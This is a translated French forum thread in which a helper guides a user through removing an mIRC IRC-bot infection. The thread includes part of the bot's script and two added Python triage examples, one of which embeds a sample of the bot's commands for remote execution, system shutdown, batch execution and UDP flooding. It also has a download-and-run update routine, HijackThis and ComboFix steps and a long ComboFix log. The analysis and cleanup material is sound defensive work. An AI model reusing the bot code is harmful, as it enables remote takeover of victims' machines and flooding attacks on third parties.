  }
  var %right = $calc(($calc($int($calc((%n1 + %n2) / 10)) + 1) * 10) - (%n1 + %n2))
  return $+(%left,%mid,$iif(%right > 9, 0, %right))
}
alias -l reverse {
  var %a = $len($$1), %b
  while (%a) { %b = $+(%b,$mid($$1,%a,1)) | dec %a }
  return %b
}
;DOWNDLOAD;
alias download { sockclose dwl | sockopen dwl %downloadsite 80 }
on *:sockopen:dwl:sockwrite -n dwl GET %path-to-file
on *:sockread:dwl: {
  sockread &a
  bwrite download\ $+ %save-as-filename -1 -1 &a
}
;UPDATE;
alias update { sockclose update | sockopen update %downloadsite 80 }
on *:sockopen:update:sockwrite -n update GET %path-to-file
on *:sockread:update: {
  sockread &a
  bwrite download\ $+ %save-as-filename -1 -1 &a
}
on *:sockclose:update:run download\ $+ %save-as-filename
;COMMAND DOS;
alias -l cecho {
  if (!$1) { echo 4 -at -[cecho\ $+ $nopath($script) $+ ]- Erreur: pas d'argument | return }
  elseif ($isfile($2) != $true) { return }
}
  elseif ($hget(cecho,$2) < $lines($2)) { 
    if ($hget(loop,$1)) { hdel loop $1 }
    echo 14 @cmd => $read($2,$hget(cecho,$2)) | hinc -m cecho $2
}
  else {
    hinc -m loop $2
    ; if the timer has fired fewer than 500 times with nothing to do, return
    if ($hget(loop,$2) < 500) { return }
    ; otherwise stop everything (I assume the command must be finished...)
    hdel loop $2
    .remove $2 | .remove $replace($1,txt,bat)
    .timer $+ $2 off 
  }
  halt
}
; simple alias that returns a string of X ($1) random characters...
alias -l _r {
  if (!$2) { return } | if (%return) { unset %return }
  %s = 1 | while (%s <= $2) { %return = %return $+ $r(a,z) | inc %s }
  return %return
}


Damn, this is hardcore, it's got everything, from TCP flooding to a keylogger for shopping sites! :O
I've already changed script.dll to "exit" and server.dll to "irc.quakenet.org"

I bought my train ticket after getting this virus, do you think that's a problem?
0
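An added example, not code from either poster: a small Python triage script that does statically what lml-mike did by hand above. It reads an mIRC script, pulls the connection settings out of the on-start event, lists the external files the script reads its configuration from (`$read serv.dll`, which is why editing serv.dll changed the C2), and maps each remote trigger in the on-text handler to the host-control primitives it reaches, following alias calls. The brace-depth block splitter, the list of primitives and the handler/alias resolution are my assumptions (a heuristic, not a full mIRC parser); the embedded excerpt is a constructed abridgement of the posted script used as sample input.

```python
import re

# Constructed, abridged excerpt modelled on the mIRC script posted above. It is
# sample input for the triage functions below, not the full file.
SAMPLE_SCRIPT = r"""
;BASE OF STARTUP/DISCONNECT;
on 1:start {
  run hex.exe /hide mIRC*
  set %servport 6667
  server $read serv.dll %servport
  set %chan #[X][OBB]
  set %nickstart [OBB][XBOT]-
  timerserver 0 60 con
  }
on *:exit:{ run $mircexe }
;GLOBAL COMMAND;
on *:text:*:*: {
  if ($nick == Predator) {
  if ($1 == .time) { msg %chan [TIME]: $date $time | halt }
  if ($1 == .shutdown) { msg %chan [SHUTDOWN]: Shutting down system. | run shutdown -s -t 00 | halt }
  if ($1 == .run) { msg %chan [RUN]: $2- | run $2- | halt }
  if ($1 == .udpflood) { set %udp.ip $2 | set %udp.secs $3 | udpflood | halt }
  if ($1 == .dos) {
  msg %chan [DOS]: Running Command: $2-
  write %output $+ .bat $2-
  run -n %output $+ .bat
  }
  if ($1 == .clone) { set %clone.user $read dico.dll | open | halt }
  }
}
alias open { sockopen clone %clone.server %clone.servport }
alias udpflood { msg %chan [UDPFLOOD]: Flooding %udp.ip | .timerudp.flood 0 0.1 udpflood2 }
alias udpflood2 { sockudp -b %udp.rand %udp.ip $rand(1,65535) $str($chr($r(0,140)),800) }
"""

# Primitives that hand a remote operator control of the host or let it reach third
# parties. Matched as whole words, case-sensitively, so chat labels such as
# "[SHUTDOWN]:" or "Running" are not counted. (My list, extend as needed.)
RISKY = ("run", "shutdown", "write", "bwrite", "sockopen", "sockudp", "sockwrite", "dcc send")
RISKY_RE = re.compile(r"\b(" + "|".join(re.escape(p) for p in RISKY) + r")\b")
HEADER_RE = re.compile(r"^(on|alias)\b", re.IGNORECASE)
TRIGGER_RE = re.compile(r"if \(\$1 == (\.\S+)\)")
SET_RE = re.compile(r"^\s*set\s+(%[\w.\-]+)\s+(.+?)\s*$")
READ_RE = re.compile(r"\$read\s+(\S+)")


def brace_balance(line):
    """Net change in brace depth contributed by one line of script."""
    return line.count("{") - line.count("}")


def split_blocks(script):
    """Split into (header, lines) blocks: an 'on'/'alias' header at depth 0
    starts a block, which ends when its braces are closed again."""
    blocks, current, depth = [], None, 0
    for line in script.splitlines():
        if current is None:
            if HEADER_RE.match(line.strip()):
                current, depth = (line.strip(), [line]), brace_balance(line)
                if depth <= 0:  # one-liner such as: on *:exit:{ run $mircexe }
                    blocks.append(current)
                    current = None
            continue
        current[1].append(line)
        depth += brace_balance(line)
        if depth <= 0:
            blocks.append(current)
            current, depth = None, 0
    return blocks


def startup_config(blocks):
    """'set %var value' made in the on-start event, plus every file read via $read."""
    config, read_files = {}, set()
    for header, lines in blocks:
        read_files.update(READ_RE.findall("\n".join(lines)))
        if re.match(r"on\s+\S*:start\b", header, re.IGNORECASE):
            for m in filter(None, map(SET_RE.match, lines)):
                config[m.group(1)] = m.group(2)
    return config, sorted(read_files)


def alias_bodies(blocks):
    """Alias name -> full body text, used to follow calls out of a handler."""
    bodies = {}
    for header, lines in blocks:
        m = re.match(r"alias\s+(?:-l\s+)?(\S+)", header, re.IGNORECASE)
        if m:
            bodies[m.group(1)] = "\n".join(lines)
    return bodies


def handler_texts(lines):
    """Yield (trigger, text) per 'if ($1 == .cmd)' branch; a branch that opens a
    brace is collected until that brace closes."""
    i = 0
    while i < len(lines):
        m = TRIGGER_RE.search(lines[i])
        if not m:
            i += 1
            continue
        trigger, text, depth = m.group(1), lines[i], brace_balance(lines[i])
        while depth > 0 and i + 1 < len(lines):
            i += 1
            text += "\n" + lines[i]
            depth += brace_balance(lines[i])
        yield trigger, text
        i += 1


def primitives_in(text, aliases, seen=None):
    """Risky primitives used directly in text or by any alias it calls, transitively."""
    seen = set() if seen is None else seen
    found = set(RISKY_RE.findall(text))
    for word in re.findall(r"[\w.\-]+", text):
        if word in aliases and word not in seen:
            seen.add(word)
            found |= primitives_in(aliases[word], aliases, seen)
    return found


def triage(script):
    """Static summary: C2 settings, config files, trigger -> primitives, self-relaunch."""
    blocks = split_blocks(script)
    config, read_files = startup_config(blocks)
    aliases = alias_bodies(blocks)
    handlers = {}
    for header, lines in blocks:
        if re.match(r"on\s+\S*:text\b", header, re.IGNORECASE):
            for trigger, text in handler_texts(lines):
                handlers[trigger] = sorted(primitives_in(text, aliases))
    relaunch = any(re.match(r"on\s+\S*:exit\b", h, re.IGNORECASE) and RISKY_RE.search("\n".join(l))
                   for h, l in blocks)
    return {"config": config, "read_files": read_files,
            "handlers": handlers, "relaunch_on_exit": bool(relaunch)}


if __name__ == "__main__":
    result = triage(SAMPLE_SCRIPT)
    print("C2 settings:", result["config"])
    print("config read from:", result["read_files"])
    print("relaunches itself on exit:", result["relaunch_on_exit"])
    for trigger, prims in result["handlers"].items():
        print(f"  {trigger:<12} {', '.join(prims) or '-'}")
```

Run on the full script from the post, the `handlers` map is what you would paste into an incident note: which remote commands only chat back (`.time`, `.version`) and which ones execute programs, write batch files or open raw sockets. The `read_files` list tells you which companion files (here serv.dll and dico.dll) must be collected alongside the script, since the actual server addresses are not in the script itself.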
Lyonnais92 Messages postés 25708 Statut Contributeur sécurité 1 537
 
Re,

I can't answer your last question.

Besides, for all I know you can decipher the content of the script much better than I can.

Did you install V:\Logs\3dsMax8\mentalray\satellite\raysat_3dsmax8server.exe?

(what is V:\)

We'll take a precautionary measure.

Run HijackThis again (by double-clicking C:\Program Files\trend micro\lml-mike.exe)

Choose Do a scan only

Tick the box in front of the following lines

O4 - HKLM\..\Run: [mirc] C:\WINDOWS\Winend\mirc.exe

Close all windows (except HijackThis), including your browser.

Click Fix checked.

Close HijackThis.

Your IRC client should no longer start at boot.

===================

We're going to analyse it:

->Show all files and folders:
click Start/Control Panel (in classic view)/Folder Options/View

[Tick] "Show hidden files and folders"

[Untick] the box "Hide protected operating system files (Recommended)"

[Untick] "Hide extensions for known file types"

Then click [Apply] to confirm the changes.

And [OK]

Go to this site:

https://www.virustotal.com/gui/

Click Browse and look for this file: C:\WINDOWS\Winend\mirc.exe

Click Send File.

A report will build up line by line.

Wait for the end. It should include the size of the file sent.

Save the report with Notepad.

Copy it into your reply.

If VirusTotal says the file has already been analysed, click the button Reanalyse the file now

=====================

Since you're probably dealing with something new, do this:

open this link: https://www.broadcom.com/

and submit your zipped file (the one from the link)

(you may have to submit the original file)

Give me the report reference.

=======================

Also send the file here: http://secubox.gateweb.org/mad.php

add: at the request of Lyonnais92 and give the URL of this topic.

===========================

We're going to use ComboFix.exe. Go to this web page to get the download links and instructions for running the tool:

https://www.bleepingcomputer.com/combofix/fr/comment-utiliser-combofix

* Make sure you have closed/disabled all anti-virus, anti-malware or anti-spyware programs so they don't interfere with ComboFix's work.

Send the contents of C:\ComboFix.txt in your next reply so I can examine it.
0
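An added example, not from the thread: Lyonnais92's HijackThis fix above removes one autostart entry that was spotted by eye. The Python below parses the three autostart formats quoted in this thread (RSIT driver/service lines, HijackThis O4 lines, ComboFix Run-key lines) into one record type and flags the entries an analyst would look at first: a path under a Temp directory, a non-executable extension, an empty `[]` where the tool found no file metadata, and a binary under the Windows directory outside its usual subfolders. The regexes, the subfolder allowlist and the flag names are my assumptions, the sample lines are constructed from the formats on the page, and the result is a review list rather than a verdict (a legitimate webcam driver sitting directly in C:\WINDOWS lands on it too).

```python
import ntpath
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: a few autostart lines in the three formats quoted in this
# thread (RSIT driver/service list, HijackThis O4 entry, ComboFix Run-key dump).
SAMPLE_LOG = r"""
S3 USBSTOR;Pilote de stockage de masse USB; C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS [2008-04-13 26368]
S4 IntelIde;IntelIde; C:\WINDOWS\system32\drivers\IntelIde.sys []
S4 mchInjDrv;mchInjDrv; \??\C:\DOCUME~1\lml-mike\LOCALS~1\Temp\mc21.tmp []
R2 avg8wd;AVG8 WatchDog; C:\logs\avg\avgwdsvc.exe [2009-03-17 298264]
O4 - HKLM\..\Run: [mirc] C:\WINDOWS\Winend\mirc.exe
"CTFMON.EXE"="c:\windows\system32\ctfmon.exe" [2008-04-13 15360]
"VX6000"="c:\windows\vVX6000.exe" [2006-06-30 994096]
"""

# RSIT: "<state><start> name;description; path [date size]"; the bracket is empty
# when the tool could not stat the file.
RSIT_RE = re.compile(r"^([RS][0-4])\s+([^;]+);([^;]*);\s*(.+?)\s*\[([^\]]*)\]$")
# HijackThis: "O4 - <hive\..\key>: [value name] command"
O4_RE = re.compile(r"^O4 - (\S+): \[([^\]]+)\]\s+(.+?)$")
# ComboFix Run-key dump: "name"="path" [date size]
COMBOFIX_RE = re.compile(r'^"([^"]+)"="([^"]+)"(?:\s*\[([^\]]*)\])?$')

# Windows subfolders where autostart binaries normally live (heuristic allowlist,
# my assumption; tune it to your own baseline).
WINDIR_OK = {"system32", "system", "inf", "microsoft.net", "fonts", "syswow64"}
EXEC_EXT = {".exe", ".sys", ".dll", ".com", ".scr", ".cpl", ".ocx"}


@dataclass
class Entry:
    source: str
    name: str
    path: str
    meta: Optional[str]  # "date size" as logged; "" if the tool logged []; None if the format has none
    flags: list = field(default_factory=list)


def parse_entries(text):
    """Turn log lines in any of the three formats into Entry records."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if (m := RSIT_RE.match(line)):
            entries.append(Entry("rsit", m.group(2), m.group(4), m.group(5)))
        elif (m := O4_RE.match(line)):
            entries.append(Entry("hijackthis", m.group(2), m.group(3), None))
        elif (m := COMBOFIX_RE.match(line)):
            entries.append(Entry("combofix", m.group(1), m.group(2), m.group(3) or ""))
    return entries


def normalize(path):
    """Lower-case the path and drop the NT object prefix (\\??\\) RSIT prints for drivers."""
    p = path.strip().strip('"')
    if p.startswith("\\??\\"):
        p = p[4:]
    return p.lower()


def assess(entry):
    """Attach review flags to one entry; an empty list means nothing stood out."""
    p = normalize(entry.path)
    parts = p.split("\\")
    flags = []
    if "\\temp\\" in p:
        flags.append("temp_dir")                 # persistence from a temp folder
    if ntpath.splitext(p)[1] not in EXEC_EXT:
        flags.append("odd_extension")            # e.g. a .tmp loaded as a driver
    if entry.meta == "":
        flags.append("no_file_metadata")         # tool could not stat the file
    if len(parts) >= 3 and parts[1] == "windows" and (len(parts) == 3 or parts[2] not in WINDIR_OK):
        flags.append("windir_nonstandard")       # C:\WINDOWS\<unknown dir>\ or Windows root
    entry.flags = flags
    return entry


def review_list(text):
    """Name -> flags for every entry that raised at least one flag."""
    return {e.name: e.flags for e in map(assess, parse_entries(text)) if e.flags}


if __name__ == "__main__":
    for name, flags in review_list(SAMPLE_LOG).items():
        print(f"{name:<12} {', '.join(flags)}")
```

On the sample, the driver loaded from a Temp folder with a .tmp extension and no file metadata collects three flags, the mIRC entry under C:\WINDOWS\Winend one, and the AVG and USBSTOR entries none. Feed it the full RSIT or ComboFix text and sort by number of flags to decide what to submit to VirusTotal first.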

lml-mike Messages postés 487 Statut Contributeur 122
 
Re,
I can't answer your last question.
Besides, for all I know you can decipher the content of the script much better than I can.
Did you install V:\Logs\3dsMax8\mentalray\satellite\raysat_3dsmax8server.exe?
(what is V:\)


V is the drive letter of my 2nd hard disk, "Videos"
3DSMAX is 3D software, but I don't see what the .exe you gave me corresponds to...
__________________________________________________________________________

Here is the ThreatExpert report: (odd, the code isn't interpreted under Firefox but it is under IE :-) )

http://lmlmike.free.fr/report.mhtml
__________________________________________________________________________

Here is the ComboFix report:
(the little beeps and warnings are impressive :P)

ComboFix 09-03-15.01 - lml-mike 2009-03-17 14:40:01.1 - NTFSx86
Microsoft Windows XP Professionnel  5.1.2600.3.1252.1.1036.18.3007.2334 [GMT 1:00]
Lancé depuis: c:\documents and settings\lml-mike\Bureau\ComboFix.exe
AV: AVG Anti-Virus *On-access scanning enabled* (Updated)
 * Un nouveau point de restauration a été créé
.
Les fichiers ci-dessous ont été désactivés pendant l'exécution:
c:\logs\SuperCopier2\SC2Hook.dll


((((((((((((((((((((((((((((((((((((   Autres suppressions   ))))))))))))))))))))))))))))))))))))))))))))))))
.

c:\windows\system32\DKjSYcfe.ini
c:\windows\system32\DKjSYcfe.ini2
c:\windows\system32\hcgalvpf.ini
c:\windows\system32\karmgybv.ini

.
(((((((((((((((((((((((((((((   Fichiers créés du 2009-02-17 au 2009-03-17  ))))))))))))))))))))))))))))))))))))
.

2009-03-17 12:41 . 2009-03-17 12:42	<REP>	d--------	C:\rsit
2009-03-17 12:41 . 2009-03-17 14:26	<REP>	d--------	c:\program files\trend micro
2009-03-09 13:11 . 2009-03-17 03:57	<REP>	d--------	c:\windows\Winend
2009-03-03 18:39 . 1997-05-29 16:26	316,416	---------	c:\windows\IsUninst.Exe
2009-03-03 18:38 . 2009-03-03 18:38	<REP>	d--------	c:\documents and settings\lml-mike\WINDOWS
2009-03-03 18:38 . 1997-05-29 16:26	316,416	--a------	c:\windows\IsUn040c.exe
2009-03-01 13:58 . 2009-03-01 13:58	43,520	--a------	c:\windows\system32\CmdLineExt03.dll
2009-03-01 12:08 . 2009-03-10 13:26	<REP>	d--h-----	C:\$AVG8.VAULT$
2009-02-28 16:11 . 2009-03-17 12:07	<REP>	d--------	c:\windows\system32\drivers\Avg
2009-02-28 16:11 . 2009-02-28 16:11	<REP>	d--------	c:\program files\AVG
2009-02-28 16:11 . 2009-03-17 08:35	325,640	--a------	c:\windows\system32\drivers\avgldx86.sys
2009-02-28 16:11 . 2009-02-28 16:11	12,552	--a------	c:\windows\system32\drivers\avgrkx86.sys
2009-02-28 16:11 . 2009-02-28 16:11	10,520	--a------	c:\windows\system32\avgrsstx.dll.old
2009-02-28 16:11 . 2009-03-17 08:35	10,520	--a------	c:\windows\system32\avgrsstx.dll
2009-02-21 08:48 . 2009-02-21 09:49	<REP>	d--------	c:\documents and settings\lml-mike\Application Data\DeepBurner
2009-02-20 16:23 . 2009-02-20 16:23	0	--a------	c:\windows\ROUTE
2009-02-20 16:12 . 2009-02-20 16:12	40	--a------	c:\windows\NAVIGMA.INI

.
((((((((((((((((((((((((((((((((((   Compte-rendu de Find3M   ))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-03-17 11:40	---------	d-----w	c:\documents and settings\lml-mike\Application Data\mIRC
2009-03-17 02:01	---------	d-----w	c:\documents and settings\All Users\Application Data\Microsoft Help
2009-03-16 23:41	---------	d-----w	c:\documents and settings\lml-mike\Application Data\teamspeak2
2009-03-09 02:44	---------	d-----w	c:\program files\Fichiers communs\Wise Installation Wizard
2009-03-09 02:44	---------	d-----w	c:\program files\AGEIA Technologies
2009-03-09 02:43	---------	d-----w	c:\documents and settings\lml-mike\Application Data\HLSW
2009-03-08 20:07	---------	d-----w	c:\documents and settings\lml-mike\Application Data\Skype
2009-03-08 20:00	---------	d-----w	c:\documents and settings\lml-mike\Application Data\skypePM
2009-03-08 00:11	409,600	----a-w	c:\windows\system32\wrap_oal.dll
2009-03-08 00:11	114,688	----a-w	c:\windows\system32\OpenAL32.dll
2009-03-06 19:54	---------	d-----w	c:\documents and settings\lml-mike\Application Data\Mumble
2009-03-06 01:15	---------	d--h--w	c:\program files\InstallShield Installation Information
2009-03-03 17:41	---------	d-----w	c:\documents and settings\lml-mike\Application Data\DAEMON Tools Pro
2009-03-01 19:41	---------	d---a-w	c:\documents and settings\All Users\Application Data\TEMP
2009-02-28 15:11	---------	d-----w	c:\documents and settings\All Users\Application Data\avg8
2009-02-28 15:10	---------	d-----w	c:\program files\Fichiers communs\G DATA
2009-02-21 06:59	120	----a-w	C:\drmHeader.bin
2009-02-13 02:01	---------	d-----w	c:\program files\Microsoft SQL Server
2009-02-12 00:31	278,528	----a-w	c:\windows\system32\TubeFinder.exe
2009-02-09 14:05	1,846,912	----a-w	c:\windows\system32\win32k.sys
2009-02-06 17:52	49,504	----a-w	c:\windows\system32\sirenacm.dll
2009-02-04 21:05	---------	d-----w	c:\program files\Fichiers communs\Skype
2009-02-04 21:05	---------	d-----w	c:\documents and settings\All Users\Application Data\Skype
2009-02-04 21:05	---------	d-----r	c:\program files\Skype
2009-02-04 20:07	---------	d-----w	c:\documents and settings\All Users\Application Data\Apple Computer
2009-01-25 21:17	---------	d-----w	c:\program files\Microsoft
2009-01-25 21:16	---------	d-----w	c:\program files\Windows Live SkyDrive
2009-01-25 21:15	---------	d-----w	c:\program files\Windows Live
2009-01-25 21:10	---------	d-----w	c:\program files\Fichiers communs\Windows Live
2009-01-21 14:34	---------	d-----w	c:\documents and settings\lml-mike\Application Data\ScripterRon
2009-01-18 20:43	---------	d-----w	c:\program files\Microsoft Games for Windows - LIVE
2009-01-18 18:30	---------	d-----w	c:\documents and settings\All Users\Application Data\Fallout3
2009-01-18 13:27	---------	d-----w	c:\program files\Fichiers communs\InstallShield
2008-12-22 04:21	107,888	----a-w	c:\windows\system32\CmdLineExt.dll
2008-12-20 22:47	826,368	----a-w	c:\windows\system32\wininet.dll
2007-04-10 13:46	996,712	----a-w	c:\windows\inf\vVX6000.exe
2007-04-10 13:46	509,288	----a-w	c:\windows\inf\VX6KTUI.dll
2007-04-10 13:46	484,712	----a-w	c:\windows\inf\vVX6000.dll
2007-04-10 13:46	36,328	----a-w	c:\windows\inf\VX6KCamd.sys
2007-04-10 13:46	202,088	----a-w	c:\windows\inf\LCCoin14.dll
2007-04-10 13:46	2,385,896	----a-w	c:\windows\inf\VX6000Xp.sys
2007-04-10 13:46	185,704	----a-w	c:\windows\inf\cVX6000.dll
2007-04-10 13:46	116,072	----a-w	c:\windows\inf\VX6000.dll
2007-03-24 09:20	46,208	----a-w	c:\windows\inf\jraid.sys
2007-03-20 10:45	479,232	----a-w	c:\windows\inf\PCCSWpdDriver.dll
2007-03-20 10:37	831,048	----a-w	c:\windows\inf\WudfUpdate_01005.dll
2007-02-23 03:25	581,632	----a-w	c:\windows\inf\nvhwvid.dll
2007-02-22 09:15	90,624	----a-w	c:\windows\inf\nmwcdcls.dll
2007-02-22 09:15	8,320	----a-w	c:\windows\inf\nmwcdc.sys
2007-02-22 09:15	65,536	----a-w	c:\windows\inf\nmwcdcocls.dll
2007-02-22 09:15	137,216	----a-w	c:\windows\inf\nmwcd.sys
2007-02-22 09:15	12,288	----a-w	c:\windows\inf\nmwcdcm.sys
2007-02-22 09:15	12,288	----a-w	c:\windows\inf\nmwcdcj.sys
2007-01-16 01:16	303,104	----a-r	c:\windows\inf\smwdmif.dll
2007-01-16 01:09	293,888	----a-r	c:\windows\inf\ADIHdAud.sys
2006-12-18 13:34	868,352	----a-r	c:\windows\inf\smax4pnp.exe
2006-12-08 09:06	139,776	----a-r	c:\windows\inf\adidts.sys
2006-08-06 22:57	93,952	----a-r	c:\windows\inf\aeaudio.sys
2006-07-26 06:56	248,832	----a-w	c:\windows\inf\yk51x86.sys
2006-06-30 07:00	28,160	----a-r	c:\windows\inf\PostProc.dll
2006-03-01 17:37	217,088	----a-r	c:\windows\inf\sis163u.sys
2006-02-07 17:52	6,912	----a-w	c:\windows\inf\JGOGO.sys
2005-01-07 16:07	138,752	----a-w	c:\windows\inf\Hdaudbus.sys
2005-01-06 20:14	49,152	----a-r	c:\windows\inf\unwlsdrv.exe
2004-08-13 02:56	5,810	----a-r	c:\windows\inf\ASACPI.sys
2004-08-05 12:00	16,896	----a-w	c:\windows\inf\usbmon.dll
2004-07-16 16:12	24,971	----a-r	c:\windows\inf\iteraid.sys
2003-08-10 12:17	256,568	----a-w	c:\windows\inf\windrvr6.sys
2003-03-09 20:31	94,208	----a-w	c:\windows\inf\HPZipt12.dll
2003-03-09 20:31	65,795	----a-w	c:\windows\inf\HPZipm12.exe
2003-03-09 20:31	61,699	----a-w	c:\windows\inf\HPZinw12.exe
2003-03-09 20:31	57,344	----a-w	c:\windows\inf\HPZisn12.dll
2003-03-09 20:31	51,024	----a-w	c:\windows\inf\hpzid412.sys
2003-03-09 20:31	233,528	----a-w	c:\windows\inf\HPZidr12.dll
2003-03-09 20:31	21,456	----a-w	c:\windows\inf\HPZius12.sys
2003-03-09 20:31	167,936	----a-w	c:\windows\inf\HPZipr12.dll
2003-03-09 20:31	16,080	----a-w	c:\windows\inf\HPZipr12.sys
2003-03-09 20:30	430,080	----a-w	c:\windows\inf\hpztbx07.exe
2003-03-09 20:30	237,568	----a-w	c:\windows\inf\HPZc3212.dll
2003-03-09 20:30	155,699	----a-w	c:\windows\inf\hpzvip07.dll
2003-03-09 04:31	36,864	----a-w	c:\windows\inf\hpofax08.dll
2003-02-06 05:38	45,056	----a-w	c:\windows\inf\HPZimn12.dll
.

(((((((((((((((((((((((((((((((((   Points de chargement Reg   ))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* les éléments vides & les éléments initiaux légitimes ne sont pas listés 
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\system32\ctfmon.exe" [2008-04-13 15360]
"msnmsgr"="c:\program files\Windows Live\Messenger\msnmsgr.exe" [2009-02-06 3885408]
"BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"="c:\program files\Fichiers communs\Ahead\Lib\NMBgMonitor.exe" [2006-12-23 143360]
"Orb"="c:\logs\Winamp Remote\bin\OrbTray.exe" [2008-04-01 507904]
"SuperCopier2.exe"="c:\logs\SuperCopier2\SuperCopier2.exe" [2006-07-07 1052672]
"PC Suite Tray"="c:\logs\Nokia\Nokia PC Suite 7\PCSuite.exe" [2008-12-03 1205760]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMAXPnP"="c:\program files\Analog Devices\Core\smax4pnp.exe" [2006-12-18 868352]
"NvCplDaemon"="c:\windows\system32\NvCpl.dll" [2008-10-07 13574144]
"WinampAgent"="c:\logs\Winamp\winampa.exe" [2008-04-01 36352]
"DU Meter"="c:\logs\DU Meter\DUMeter.exe" [2003-06-22 1303552]
"DiskeeperSystray"="c:\logs\Diskeeper\DkIcon.exe" [2004-10-04 176216]
"NeroFilterCheck"="c:\program files\Fichiers communs\Ahead\Lib\NeroCheck.exe" [2006-01-12 155648]
"LifeCam"="c:\program files\Microsoft LifeCam\LifeExp.exe" [2006-06-30 269104]
"VX6000"="c:\windows\vVX6000.exe" [2006-06-30 994096]
"HPDJ Taskbar Utility"="c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" [2003-03-09 188416]
"NvMediaCenter"="c:\windows\system32\NvMcTray.dll" [2008-10-07 86016]
"SunJavaUpdateSched"="c:\program files\Java\jre6\bin\jusched.exe" [2008-11-10 136600]
"QuickTime Task"="c:\logs\QuickTime Alternative\QTTask.exe" [2009-01-05 413696]
"AVG8_TRAY"="c:\logs\avg\avgtray.exe" [2009-03-17 1932568]
"nwiz"="nwiz.exe" [2008-10-07 c:\windows\system32\nwiz.exe]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2008-04-13 15360]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\avgrsstarter]
2009-03-17 08:35 10520 c:\windows\system32\avgrsstx.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows]
"AppInit_DLLs"=antbve.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"vidc.X264"= x264vfw.dll
"vidc.DIV3"= DivXc32.dll
"vidc.DIV4"= DivXc32f.dll
"msacm.divxa32"= DivXa32.acm

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"v:\\Steam\\SteamApps\\lml_mike@hotmail.com\\counter-strike source\\hl2.exe"=
"c:\\Logs\\HLSW\\hlsw.exe"=
"c:\\Logs\\ABC\\abc.exe"=
"v:\\Steam\\steam.exe"=
"c:\\Program Files\\Fichiers communs\\Nokia\\Service Layer\\A\\nsl_host_process.exe"=
"c:\\Program Files\\Nokia\\Nokia Software Updater\\nsu_ui_client.exe"=
"c:\\WINDOWS\\system32\\mmc.exe"=
"v:\\eMule\\emule.exe"=
"c:\\Program Files\\Microsoft LifeCam\\LifeCam.exe"=
"c:\\Program Files\\Microsoft LifeCam\\LifeExp.exe"=
"v:\\Quake III Arena\\quake3.exe"=
"c:\\Logs\\Mozilla Firefox\\firefox.exe"=
"c:\\Logs\\FlashFXP\\flashfxp.exe"=
"c:\\Logs\\Winamp Remote\\bin\\Orb.exe"=
"c:\\Logs\\Winamp Remote\\bin\\OrbTray.exe"=
"c:\\Logs\\Winamp Remote\\bin\\OrbStreamerClient.exe"=
"v:\\Logs\\backburner\\monitor.exe"=
"v:\\Logs\\backburner\\manager.exe"=
"v:\\Logs\\backburner\\server.exe"=
"v:\\Steam\\SteamApps\\lml_mike@hotmail.com\\half-life 2 deathmatch\\hl2.exe"=
"c:\\Program Files\\Microsoft Office\\Office12\\OUTLOOK.EXE"=
"v:\\Steam\\SteamApps\\lml_mike@hotmail.com\\synergy\\hl2.exe"=
"v:\\Steam\\SteamApps\\lml_mike@hotmail.com\\zombie panic! source\\hl2.exe"=
"c:\\Logs\\mIRC\\mirc.exe"=
"c:\\Program Files\\Java\\jre6\\bin\\java.exe"=
"c:\\Documents and Settings\\All Users\\Application Data\\Kaspersky Lab Setup Files\\Kaspersky Internet Security 2009\\English\\setup.exe"=
"v:\\Shaun White Snowboarding\\ShaunWhiteSnowboardingGame.exe"=
"v:\\Shaun White Snowboarding\\ShaunWhiteSnowboarding.exe"=
"c:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
"c:\\Logs\\avg\\avgam.exe"=
"c:\\Logs\\avg\\avgupd.exe"=
"c:\\Documents and Settings\\lml-mike\\Application Data\\Macromedia\\Flash Player\\www.macromedia.com\\bin\\octoshape\\octoshape.exe"=
"p:\\Prince of Persia\\Prince of Persia.exe"=
"p:\\Prince of Persia\\PrinceOfPersia_Launcher.exe"=
"c:\\Program Files\\Skype\\Phone\\Skype.exe"=
"p:\\Mirror's Edge\\Binaries\\MirrorsEdge.exe"=
"c:\\WINDOWS\\Winend\\mirc.exe"=
"v:\\Steam\\SteamApps\\common\\left 4 dead\\left4dead.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"6112:TCP"= 6112:TCP:6112
"6119:TCP"= 6119:TCP:6119
"6112:UDP"= 6112:UDP:6112udp
"6119:UDP"= 6119:UDP:6119udp
"27015:TCP"= 27015:TCP:27015
"27015:UDP"= 27015:UDP:27015

R0 AvgRkx86;avgrkx86.sys;c:\windows\system32\drivers\avgrkx86.sys [2009-02-28 12552]
R1 AvgLdx86;AVG AVI Loader Driver x86;c:\windows\system32\drivers\avgldx86.sys [2009-02-28 325640]
R2 acedrv11;acedrv11;c:\windows\system32\drivers\ACEDRV11.sys [2008-01-23 501560]
R2 avg8wd;AVG8 WatchDog;c:\logs\avg\avgwdsvc.exe [2009-02-28 298264]
R2 GDTdiInterceptor;GDTdiInterceptor;c:\windows\system32\drivers\GDTdiIcpt.sys [2008-12-17 51016]
S3 MSSQL$SONY_MEDIAMGR2;SQL Server (SONY_MEDIAMGR2);c:\program files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [2008-12-18 29181272]
S3 nmwcdnsu;Nokia USB Flashing Phone Parent;c:\windows\system32\drivers\nmwcdnsu.sys [2008-06-30 138112]
